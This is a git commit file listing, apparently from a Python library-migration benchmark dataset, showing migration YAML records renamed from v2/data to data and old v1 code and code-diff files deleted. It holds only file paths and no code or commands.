 rename {v2/data => data}/migration/netaddr__ipaddress__ovirt@vdsm__6eef802.yaml (100%)
 rename {v2/data => data}/migration/netaddr__py2-ipaddress__jimfunk@django-postgresql-netfields__a5a1118.yaml (100%)
 rename {v2/data => data}/migration/netaddr__py2-ipaddress__nitmir@policyd-rate-limit__c024e06.yaml (100%)
 rename {v2/data => data}/migration/neutron__neutron-lib__openstack@networking-bagpipe__4bb14fa.yaml (100%)
 rename {v2/data => data}/migration/neutron__neutron-lib__openstack@networking-fortinet__2365dcb.yaml (100%)
 rename {v2/data => data}/migration/neutron__neutron-lib__openstack@networking-generic-switch__c6f4b71.yaml (100%)
 rename {v2/data => data}/migration/neutron__neutron-lib__openstack@networking-nec__ff1695d.yaml (100%)
 rename {v2/data => data}/migration/neutron__neutron-lib__openstack@networking-odl__a40b9d9.yaml (100%)
 rename {v2/data => data}/migration/node-semver__semantic-version__openstack@solar__8766f11.yaml (100%)
 rename {v2/data => data}/migration/oauth2__oauthlib__discogs@discogs_client__c56f61a.yaml (100%)
 rename {v2/data => data}/migration/openpyxl__xlsxwriter__bcgov@gwells__57d12c4.yaml (100%)
 rename {v2/data => data}/migration/openstackclient__osc-lib__openstack@deb-python-ironic-inspector-client__c25d73e.yaml (100%)
 rename {v2/data => data}/migration/openstackclient__osc-lib__openstack@deb-python-muranoclient__e3a2b68.yaml (100%)
 rename {v2/data => data}/migration/openstackclient__osc-lib__openstack@python-searchlightclient__0bc93d1.yaml (100%)
 rename {v2/data => data}/migration/paramiko__fabric__aws@aws-parallelcluster__d49460a.yaml (100%)
 rename {v2/data => data}/migration/pep8__pycodestyle__cyberbotics@urdf2webots__723168d.yaml (100%)
 rename {v2/data => data}/migration/pep8__pycodestyle__fabioz@PyDev.Debugger__d535c19.yaml (100%)
 rename {v2/data => data}/migration/pep8__pycodestyle__hhatto@autopep8__3e1c196.yaml (100%)
 rename {v2/data => data}/migration/pep8__pycodestyle__nchammas@flintrock__7323298.yaml (100%)
 rename {v2/data => data}/migration/pep8__pycodestyle__openstack@designate__2c9e9f5.yaml (100%)
 rename {v2/data => data}/migration/pep8__pycodestyle__openstack@sahara__61b0b2e.yaml (100%)
 rename {v2/data => data}/migration/pep8__pycodestyle__schlamar@flake8-todo__fcd59c6.yaml (100%)
 rename {v2/data => data}/migration/pil__pillow__rcos@observatory-retired__f970b54.yaml (100%)
 rename {v2/data => data}/migration/pil__pillow__shoebot@shoebot__0171fb9.yaml (100%)
 rename {v2/data => data}/migration/prettytable__tabulate__educationaltestingservice@skll__f870a65.yaml (100%)
 rename {v2/data => data}/migration/progressbar__tqdm__ozencb@yts-scraper__383401a.yaml (100%)
 rename {v2/data => data}/migration/progressbar__tqdm__redkyn@assigner__f132d03.yaml (100%)
 rename {v2/data => data}/migration/progressbar__tqdm__rivuletstudio@rivuletpy__52068ad.yaml (100%)
 rename {v2/data => data}/migration/progressbar__tqdm__wkentaro@fcn__399069a.yaml (100%)
 rename {v2/data => data}/migration/py-bcrypt__bcrypt__weasyl@weasyl__f6230c7.yaml (100%)
 rename {v2/data => data}/migration/pyandoc__pypandoc__hustlzp@permission__d174a21.yaml (100%)
 rename {v2/data => data}/migration/pycrypto__cryptography__freeopcua@opcua-asyncio__cdaff15.yaml (100%)
 rename {v2/data => data}/migration/pycrypto__pycryptodome__camptocamp@c2cgeoportal__14388c3.yaml (100%)
 rename {v2/data => data}/migration/pycrypto__pycryptodome__hhyo@archery__e192ca6.yaml (100%)
 rename {v2/data => data}/migration/pycryptodome__cryptography__allencellmodeling@cookiecutter-pypackage__8d172cb.yaml (100%)
 rename {v2/data => data}/migration/pycryptodome__cryptography__apache@libcloud__a68022d.yaml (100%)
 rename {v2/data => data}/migration/pycryptodome__cryptography__cloudve@cloudbridge__27b217e.yaml (100%)
 rename {v2/data => data}/migration/pycryptodome__cryptography__coresecurity@pysap__21fe13a.yaml (100%)
 rename {v2/data => data}/migration/pycryptodome__cryptography__jvanovost@dc09_spt__08a9d0b.yaml (100%)
 rename {v2/data => data}/migration/pycryptodome__cryptography__leifj@pyxmlsecurity__b5d88c8.yaml (100%)
 rename {v2/data => data}/migration/pycryptodome__cryptography__mitya57@secretstorage__e637c3b.yaml (100%)
 rename {v2/data => data}/migration/pycryptodome__cryptography__ojarva@python-sshpubkeys__e3ee2d2.yaml (100%)
 rename {v2/data => data}/migration/pycryptodome__cryptography__openstack@glance__5ebde90.yaml (100%)
 rename {v2/data => data}/migration/pycryptodome__cryptography__openstack@keystonemiddleware__e23cb36.yaml (100%)
 rename {v2/data => data}/migration/pycryptodome__cryptography__privacyidea@privacyidea__bcd8a45.yaml (100%)
 rename {v2/data => data}/migration/pycryptodome__cryptography__rev112@pyope__48c294a.yaml (100%)
 rename {v2/data => data}/migration/pycryptodome__cryptography__secdev@scapy__c24298b.yaml (100%)
 rename {v2/data => data}/migration/pycryptodome__cryptography__spockbotmc@spockbot__4442170.yaml (100%)
 rename {v2/data => data}/migration/pycryptodome__cryptography__tgalal@python-axolotl__f74a936.yaml (100%)
 rename {v2/data => data}/migration/pycryptodome__cryptography__twisted@twisted__e31995c.yaml (100%)
 rename {v2/data => data}/migration/pycryptodome__pycryptodomex__azure@aztk__19dde42.yaml (100%)
 rename {v2/data => data}/migration/pycryptodome__pycryptodomex__malwaredllc@byob__9291b54.yaml (100%)
 rename {v2/data => data}/migration/pycryptodome__pycryptodomex__snemes@malware-analysis__02b064b.yaml (100%)
 rename {v2/data => data}/migration/pycurl__requests__tasmota@decode-config__5be6141.yaml (100%)
 rename {v2/data => data}/migration/pycurl__requests__upstox@upstox-python__dce8760.yaml (100%)
 rename {v2/data => data}/migration/pydotplus__pydot2__networkx@networkx__481f3e8.yaml (100%)
 rename {v2/data => data}/migration/pydotplus__pydot2__trungdong@prov__acb9b05.yaml (100%)
 rename {v2/data => data}/migration/pydotplus__pydot__mathics@mathics__915daeb.yaml (100%)
 rename {v2/data => data}/migration/pyfits__astropy__glue-viz@glue__5b2d7f9.yaml (100%)
 rename {v2/data => data}/migration/pyfits__astropy__icrar@ngas__fa8b714.yaml (100%)
 rename {v2/data => data}/migration/pyfits__astropy__spacetelescope@pysynphot__5b80ada.yaml (100%)
 rename {v2/data => data}/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__89c7afc.yaml (100%)
 rename {v2/data => data}/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__a7f4c3f.yaml (100%)
 rename {v2/data => data}/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__e5073e4.yaml (100%)
 rename {v2/data => data}/migration/pyopenssl__cryptography__RIPE-NCC@ripe-atlas-sagan__f6fc10c.yaml (100%)
 rename {v2/data => data}/migration/pyopenssl__cryptography__celery@celery__9b39fc4.yaml (100%)
 rename {v2/data => data}/migration/pyopenssl__cryptography__openstack@neutron-lbaas__bb34d71.yaml (100%)
 rename {v2/data => data}/migration/pypcap__pcapy__openstack@steth__a981d2e.yaml (100%)
 rename {v2/data => data}/migration/pyqt5__pyside2__catalystneuro@nwb-conversion-tools__a2ef335.yaml (100%)
 rename {v2/data => data}/migration/pyqt5__pyside2__sanpen@gridcal__39a5dd9.yaml (100%)
 rename {v2/data => data}/migration/pyqt5__pyside6__toufool@auto-split__86244b6.yaml (100%)
 rename {v2/data => data}/migration/pyquery__beautifulsoup4__idan@telostats__f73354a.yaml (100%)
 rename {v2/data => data}/migration/pyside2__qtpy__pypeit@pypeit__ba5e21a.yaml (100%)
 rename {v2/data => data}/migration/python-ldap__ldap3__cloud-custodian@cloud-custodian__cbaf252.yaml (100%)
 rename {v2/data => data}/migration/python-ldap__ldap3__ictu@quality-time__cc47b42.yaml (100%)
 rename {v2/data => data}/migration/python3-memcached__pymemcache__flan@staticdhcpd__0e64819.yaml (100%)
 rename {v2/data => data}/migration/pytorch-pretrained-bert__pytorch-transformers__haoxizhong@pytorch-worker__fa8de77.yaml (100%)
 rename {v2/data => data}/migration/pytorch-pretrained-bert__pytorch-transformers__kaushaltrivedi@fast-bert__1c96992.yaml (100%)
 rename {v2/data => data}/migration/pytorch-pretrained-bert__pytorch-transformers__naver@claf__cffe499.yaml (100%)
 rename {v2/data => data}/migration/pytorch-pretrained-bert__transformers__tiiiger@bert_score__04376e1.yaml (100%)
 rename {v2/data => data}/migration/pytorch-transformers__transformers__allenai@abductive-commonsense-reasoning__abfeffc.yaml (100%)
 rename {v2/data => data}/migration/pytorch-transformers__transformers__calclavia@story-generation__8954fad.yaml (100%)
 rename {v2/data => data}/migration/pytorch-transformers__transformers__huggingface@transfer-learning-conv-ai__16074b2.yaml (100%)
 rename {v2/data => data}/migration/pytorch-transformers__transformers__intellabs@nlp-architect__9f067f2.yaml (100%)
 rename {v2/data => data}/migration/pytorch-transformers__transformers__jsybrandt@agatha__b570ef0.yaml (100%)
 rename {v2/data => data}/migration/pytorch-transformers__transformers__nvidia@nemo__7866512.yaml (100%)
 rename {v2/data => data}/migration/pytz__pendulum__oddluck@limnoria-plugins__2c40713.yaml (100%)
 rename {v2/data => data}/migration/pytz__pendulum__oddluck@limnoria-plugins__33c7a3f.yaml (100%)
 rename {v2/data => data}/migration/pyuserinput__pynput__activitywatch@aw-watcher-afk__297b58c.yaml (100%)
 rename {v2/data => data}/migration/pyyaml__oyaml__cronyo@cronyo__edd0cc6.yaml (100%)
 rename {v2/data => data}/migration/pyyaml__oyaml__gammapy@gammapy__848da63.yaml (100%)
 rename {v2/data => data}/migration/pyyaml__ruamel.yaml__cloud-custodian@cloud-custodian__ee4d526.yaml (100%)
 rename {v2/data => data}/migration/pyyaml__ruamel.yaml__common-workflow-language@cwltool__b9b65c0.yaml (100%)
 rename {v2/data => data}/migration/pyyaml__ruamel.yaml__holgern@beem__f5ba90e.yaml (100%)
 rename {v2/data => data}/migration/raven__sentry-sdk__agdsn@sipa__ea23791.yaml (100%)
 rename {v2/data => data}/migration/raven__sentry-sdk__city-of-helsinki@respa__4fecb97.yaml (100%)
 rename {v2/data => data}/migration/raven__sentry-sdk__etalab@udata__9bc0f73.yaml (100%)
 rename {v2/data => data}/migration/raven__sentry-sdk__habitissimo@myaas__0a65bcc.yaml (100%)
 rename {v2/data => data}/migration/raven__sentry-sdk__kiwicom@the-zoo__e22070c.yaml (100%)
 rename {v2/data => data}/migration/raven__sentry-sdk__mozilla@addons-server__634c64f.yaml (100%)
 rename {v2/data => data}/migration/raven__sentry-sdk__onecodex@onecodex__120d961.yaml (100%)
 rename {v2/data => data}/migration/raven__sentry-sdk__pokainc@cfn-cross-region-export__f1120d3.yaml (100%)
 rename {v2/data => data}/migration/raven__sentry-sdk__samuelcolvin@aiohttp-toolbox__3b7a2a3.yaml (100%)
 rename {v2/data => data}/migration/raven__sentry-sdk__teamsempo@sempoblockchain__449990a.yaml (100%)
 rename {v2/data => data}/migration/raven__sentry-sdk__thespaghettidetective@thespaghettidetective__b86b375.yaml (100%)
 rename {v2/data => data}/migration/raven__sentry-sdk__weasyl@weasyl__d10cb16.yaml (100%)
 rename {v2/data => data}/migration/redis__aioredis__walletconnect@py-walletconnect-bridge__c2d3db2.yaml (100%)
 rename {v2/data => data}/migration/requests-oauth2__oauthlib__mozilla@addons-server__5fd17b4.yaml (100%)
 rename {v2/data => data}/migration/requests-oauth2__requests-oauthlib__getsentry@sentry__0bfe540.yaml (100%)
 rename {v2/data => data}/migration/requests-oauth2__requests-oauthlib__gunthercox@chatterbot__6c3b234.yaml (100%)
 rename {v2/data => data}/migration/requests-oauth2__requests-oauthlib__sarumont@py-trello__ede0ceb.yaml (100%)
 rename {v2/data => data}/migration/requests-oauth2__requests__sybrenstuvel@flickrapi__c4f8d79.yaml (100%)
 rename {v2/data => data}/migration/requests__aiohttp__aiortc@aiortc__d30c240.yaml (100%)
 rename {v2/data => data}/migration/requests__aiohttp__ictu@quality-time__d3a9a16.yaml (100%)
 rename {v2/data => data}/migration/requests__aiohttp__keselekpermen69@userbutt__a2dd44e.yaml (100%)
 rename {v2/data => data}/migration/requests__aiohttp__paradoxalarminterface@pai__fac6f80.yaml (100%)
 rename {v2/data => data}/migration/requests__aiohttp__raptor123471@dingolingo__1d8923a.yaml (100%)
 rename {v2/data => data}/migration/requests__aiohttp__talkpython@async-techniques-python-course__a5c04bb.yaml (100%)
 rename {v2/data => data}/migration/requests__aiohttp__talkpython@async-techniques-python-course__ab4e5fd.yaml (100%)
 rename {v2/data => data}/migration/requests__aiohttp__usergeteam@userge-plugins__80a5434.yaml (100%)
 rename {v2/data => data}/migration/restkit__requests__sporteasy@python-poeditor__5710859.yaml (100%)
 rename {v2/data => data}/migration/retrying__tenacity__intelai@inference-model-manager__71aff3a.yaml (100%)
 rename {v2/data => data}/migration/retrying__tenacity__openstack@aodh__7587ab9.yaml (100%)
 rename {v2/data => data}/migration/retrying__tenacity__openstack@ceilometer__380bb26.yaml (100%)
 rename {v2/data => data}/migration/retrying__tenacity__openstack@ironic-inspector__f4648fa.yaml (100%)
 rename {v2/data => data}/migration/retrying__tenacity__openstack@ironic__b0607a2.yaml (100%)
 rename {v2/data => data}/migration/retrying__tenacity__pokainc@cfn-cross-region-export__8d0ec68.yaml (100%)
 rename {v2/data => data}/migration/rpi.gpio__gpiozero__raspberrypilearning@push-button-stop-motion__0b6cdad.yaml (100%)
 rename {v2/data => data}/migration/ruamel.yaml__pyyaml__cloud-custodian@cloud-custodian__12e3e80.yaml (100%)
 rename {v2/data => data}/migration/ruamel.yaml__pyyaml__microsoft@nni__b955ac9.yaml (100%)
 rename {v2/data => data}/migration/simplejson__ujson__covid-projections@covid-data-model__95385ff.yaml (100%)
 rename {v2/data => data}/migration/simplejson__ujson__zulip@zulip__222ef67.yaml (100%)
 rename {v2/data => data}/migration/slackclient__slack-sdk__alice-biometrics@petisco__9abf7b1.yaml (100%)
 rename {v2/data => data}/migration/slackclient__slack-sdk__slackapi@python-slack-events-api__813214e.yaml (100%)
 rename {v2/data => data}/migration/slackclient__slack-sdk__slackapi@python-slack-sdk__5f4d92a.yaml (100%)
 rename {v2/data => data}/migration/slackclient__slack-sdk__zulip@python-zulip-api__2d9cf64.yaml (100%)
 rename {v2/data => data}/migration/smbus-cffi__smbus2__pimoroni@inky__cba3651.yaml (100%)
 rename {v2/data => data}/migration/sphinx-rtd-theme__edx-sphinx-theme__edx@ecommerce__c1e120f.yaml (100%)
 rename {v2/data => data}/migration/sphinx-rtd-theme__guzzle-sphinx-theme__bashtage@arch__3620700.yaml (100%)
 rename {v2/data => data}/migration/suds-py3__zeep__whynothugo@django-afip__827dd9f.yaml (100%)
 rename {v2/data => data}/migration/suds__zeep__hbldh@pybankid__79e424c.yaml (100%)
 rename {v2/data => data}/migration/suds__zeep__openstate@open-raadsinformatie__b56e481.yaml (100%)
 rename {v2/data => data}/migration/tables__h5py__yoseflab@scvi__35163f0.yaml (100%)
 rename {v2/data => data}/migration/toml__tomlkit__greenbone@python-gvm__75a11ed.yaml (100%)
 rename {v2/data => data}/migration/toolz__cytoolz__nlesc@xtas__0dbf388.yaml (100%)
 rename {v2/data => data}/migration/trollius__asyncio__popupcad@popupcad__d0526f6.yaml (100%)
 rename {v2/data => data}/migration/twitter__tweepy__cloudbotirc@cloudbot__f824322.yaml (100%)
 rename {v2/data => data}/migration/twitter__tweepy__huntwelch@mongobot__bea008a.yaml (100%)
 rename {v2/data => data}/migration/ufolib__fonttools__googlefonts@cu2qu__3543e4f.yaml (100%)
 rename {v2/data => data}/migration/ujson__rapidjson__htrc@htrc-feature-reader__7eae68a.yaml (100%)
 rename {v2/data => data}/migration/ujson__rapidjson__kinto@kinto__951dd25.yaml (100%)
 rename {v2/data => data}/migration/ujson__rapidjson__murthylab@sleap__50721de.yaml (100%)
 rename {v2/data => data}/migration/umsgpack__msgpack__logicaldash@lise__028d0b3.yaml (100%)
 rename {v2/data => data}/migration/unicodecsv__csv__cfpb@cfgov-refresh__b4beec3.yaml (100%)
 rename {v2/data => data}/migration/unicodecsv__csv__seed-platform@seed__119ba4b.yaml (100%)
 rename {v2/data => data}/migration/unipath__pathlib__studentenportal@web__4842cff.yaml (100%)
 rename {v2/data => data}/migration/urllib3__requests__byrnereese@uphold-sdk-python__14fd085.yaml (100%)
 rename {v2/data => data}/migration/urllib3__requests__canonical@cloud-init__0fc887d.yaml (100%)
 rename {v2/data => data}/migration/urllib3__requests__finish06@pyunifi__3e53482.yaml (100%)
 rename {v2/data => data}/migration/urllib3__requests__mixpanel@mixpanel-python__e8a9330.yaml (100%)
 rename {v2/data => data}/migration/watchdog__pyinotify__onitu@onitu__04575c8.yaml (100%)
 rename {v2/data => data}/migration/webapp2__flask__c4rlo@vimhelp__7a5fadf.yaml (100%)
 rename {v2/data => data}/migration/werkzeug__webob__dahlia@sqlalchemy-imageattach__7cd3ca5.yaml (100%)
 rename {v2/data => data}/migration/wget__requests__noaa-oar-arl@monet__590936b.yaml (100%)
 rename {v2/data => data}/migration/xlsxwriter__openpyxl__bcgov@gwells__472f336.yaml (100%)
 delete mode 100644 v1/code/.gitignore
 delete mode 100644 v1/code/.idea/.gitignore
 delete mode 100644 v1/code/.idea/code.iml
 delete mode 100644 v1/code/.idea/inspectionProfiles/Project_Default.xml
 delete mode 100644 v1/code/.idea/inspectionProfiles/profiles_settings.xml
 delete mode 100644 v1/code/.idea/misc.xml
 delete mode 100644 v1/code/.idea/modules.xml
 delete mode 100644 v1/code/.idea/vcs.xml
 delete mode 100644 v1/code/core/Arguments.py
 delete mode 100644 v1/code/core/Constants.py
 delete mode 100644 v1/code/core/Factory.py
 delete mode 100644 v1/code/core/to_dict.py
 delete mode 100644 v1/code/db/Db.py
 delete mode 100644 v1/code/db/__init__.py
 delete mode 100644 v1/code/format/JSONFormat.py
 delete mode 100644 v1/code/format/OutputFormat.py
 delete mode 100644 v1/code/format/YAMLFormat.py
 delete mode 100644 v1/code/format/__init__.py
 delete mode 100644 v1/code/pymigbench.py
 delete mode 100644 v1/code/query/Count.py
 delete mode 100644 v1/code/query/Detail.py
 delete mode 100644 v1/code/query/Listing.py
 delete mode 100644 v1/code/query/Query.py
 delete mode 100644 v1/code/query/Result.py
 delete mode 100644 v1/code/query/Summary.py
 delete mode 100644 v1/code/requirements.txt
 delete mode 100644 v1/code/tests/__init__.py
 delete mode 100644 v1/code/tests/misc_test.py
 delete mode 100644 v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.diff
 delete mode 100644 v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.source.py
 delete mode 100644 v1/data/codefile/agdsn@sipa__ea23791__sipa$initialization.py.target.py
 delete mode 100644 v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.diff
 delete mode 100644 v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.source.py
 delete mode 100644 v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$application$notifier$slack_notifier.py.target.py
 delete mode 100644 v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.diff
 delete mode 100644 v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.source.py
 delete mode 100644 v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$extra$slack$is_slack_available.py.target.py
 delete mode 100644 v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.diff
 delete mode 100644 v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.source.py
 delete mode 100644 v1/data/codefile/alice-biometrics@petisco__9abf7b1__petisco$legacy$notifier$infrastructure$slack$slack_notifier.py.target.py
 delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.diff
 delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.source.py
 delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$generate.py.target.py
 delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.diff
 delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.source.py
 delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$entity$files${{ name }}.template$controller.py.template.target.py
 delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.diff
 delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.source.py
 delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$__init__.py.target.py
 delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.diff
 delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.source.py
 delete mode 100644 v1/data/codefile/apryor6@flaskerize__59d8319__flaskerize$schematics$flask-api$files${{ name }}.template$app$widget$controller.py.target.py
 delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$client.py.diff
 delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$client.py.source.py
 delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$client.py.target.py
 delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.diff
 delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.source.py
 delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$node_scripts$install$create_user.py.target.py
 delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.diff
 delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.source.py
 delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$spark$models$models.py.target.py
 delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.diff
 delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.source.py
 delete mode 100644 v1/data/codefile/azure@aztk__19dde42__aztk$utils$secure_utils.py.target.py
 delete mode 100644 v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.diff
 delete mode 100644 v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.source.py
 delete mode 100644 v1/data/codefile/bcgov@gwells__472f336__app$backend$wells$management$commands$export.py.target.py
 delete mode 100644 v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.diff
 delete mode 100644 v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.source.py
 delete mode 100644 v1/data/codefile/bcgov@gwells__57d12c4__app$backend$wells$management$commands$export.py.target.py
 delete mode 100644 v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.diff
 delete mode 100644 v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.source.py
 delete mode 100644 v1/data/codefile/bcgov@theorgbook__728f86e__tob-api$api_v2$swagger.py.target.py
 delete mode 100644 v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.diff
 delete mode 100644 v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.source.py
 delete mode 100644 v1/data/codefile/biznetgio@restknot__6b10345__agent$dnsagent$clis$start.py.target.py
 delete mode 100644 v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.diff
 delete mode 100644 v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.source.py
 delete mode 100644 v1/data/codefile/biznetgio@restknot__6b10345__api$app$helpers$producer.py.target.py
 delete mode 100644 v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.diff
 delete mode 100644 v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.source.py
 delete mode 100644 v1/data/codefile/bretttolbert@verbecc-svc__24a848d__python$verb_conjugate_fr$__init__.py.target.py
 delete mode 100644 v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.diff
 delete mode 100644 v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.source.py
 delete mode 100644 v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$__init__.py.target.py
 delete mode 100644 v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.diff
 delete mode 100644 v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.source.py
 delete mode 100644 v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.target.py
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.diff
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.source.py
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.target.py
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.diff
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.source.py
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.target.py
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.diff
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.source.py
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$utils.py.target.py
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.diff
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.source.py
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__cbaf252__tools$c7n_mailer$c7n_mailer$address.py.target.py
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.diff
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.source.py
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$cli.py.target.py
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.diff
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.source.py
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.target.py
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.diff
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.source.py
 delete mode 100644 v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.target.py
 delete mode 100644 v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.diff
 delete mode 100644 v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.source.py
 delete mode 100644 v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.target.py
 delete mode 100644 v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.diff
 delete mode 100644 v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.source.py
 delete mode 100644 v1/data/codefile/duanhongyi@dwebsocket__d707ff6__examples$run_eventlet.py.target.py
 delete mode 100644 v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.diff
 delete mode 100644 v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.source.py
 delete mode 100644 v1/data/codefile/elblogbruno@notionai-mymind__002f5bd__Python Server$app$server.py.target.py
 delete mode 100644 v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.diff
 delete mode 100644 v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.source.py
 delete mode 100644 v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.target.py
 delete mode 100644 v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.diff
 delete mode 100644 v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.source.py
 delete mode 100644 v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.target.py
 delete mode 100644 v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.diff
